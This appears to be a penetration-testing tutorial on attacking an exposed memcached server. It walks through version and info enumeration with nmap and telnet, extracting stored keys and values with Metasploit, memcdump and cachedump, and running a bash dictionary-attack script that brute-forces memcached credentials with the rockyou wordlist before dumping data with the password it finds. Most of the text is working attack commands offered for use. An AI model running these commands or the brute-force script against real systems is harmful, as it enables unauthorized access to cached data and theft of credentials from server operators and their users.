This journey starts with a memcached server which we have access. The usual question that come up in mind is: how can I get the data it holds and exploit it in some way?
Let’s first dig into it and grab some info. Let’s first check the version behind:
nmap -sV -script banner <ip>
# or you can use telnet
telnet <ip> 11211
#and issue this command
version Let’s dig more into it and check the max number of connection it supports:
nmap -script memcached-info -p 11211 <ip> Let’s check the current items on the memcached server:
memcstat --servers=<ip>
# and look for the item "curr_items: xx" Retrieve key value by metasploit module:
msfconsole
search memcache
use ausiliary/gather/memcached_extractor
set RHOSTS <ip>
exploit Retrieve all the keys present into memcdump:
memcdump --servers=<ip> Retrieve slabs, stats and items:
# while inside the memcached with telnet or netcat
stats slabs
stats items
# suppose the slabs id = 1 which is the first argument
# and the number to dump which with 0 is all
stats cachedump 1 0
# and get the value of the key
get <key> Retrieve the value of one key:
# first check memcached-tool if installed and find it
find / -name memcached-tool
memcached-tool <ip>:11211 dump Attack with dictionary!
Let’s say we have a username…how to bruteforce the password if our memcached server use authentication? Let’s use a script for that called memcache-dictionary-attack.sh
# memcache-dictionary-attack.sh
#! /bin/bash
while read F ; do
echo "Trying $F"
if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then
echo "Password Found: "$F
break
fi
done < $3 And fire it up against our target:
./memcache-dictionary-attack.sh <IP> <username> /usr/share/wordlists/rockyou.txt In fact now we can dump the server:
memcstat --servers=<ip> --username=<user> --password=<password>
# or we can retrieve key value for example
memccat --servers=<ip> --username=<user> --password=<password> <key>